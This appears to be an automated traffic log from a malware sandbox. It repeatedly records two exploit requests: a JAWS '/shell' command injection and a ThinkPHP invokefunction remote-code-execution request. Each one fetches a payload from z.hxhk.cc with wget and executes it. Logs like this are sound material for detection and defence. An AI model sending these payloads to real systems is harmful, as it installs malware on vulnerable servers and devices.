Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
